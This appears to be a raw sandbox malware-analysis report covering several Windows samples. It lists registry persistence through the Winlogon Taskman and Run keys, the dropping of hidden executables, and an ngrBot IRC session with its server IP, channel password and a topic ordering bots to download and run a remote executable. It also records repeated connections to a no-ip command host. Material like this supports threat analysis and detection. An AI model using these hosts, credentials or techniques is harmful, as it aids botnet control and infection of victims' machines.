Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Reads HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman"
File Changes by all processes
New Files \Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Opened Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
\\.\PIPE\lsarpc
Deleted Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Chronological Order Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Copy File: c:\1.EXE to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
hosting infos:
http://whois.domaintools.com/173.248.136.153
91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865 PASS ngrBot
NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting
Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]
hosting infos:
http://whois.domaintools.com/91.211.117.46
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865 PASS ngrBot
NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting
Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]
hosting infos:
http://whois.domaintools.com/91.211.117.46
bozoo.no-ip.biz
bozoo.no-ip.biz 94.120.148.91
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Registry Changes by all processes
Create or Open
Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
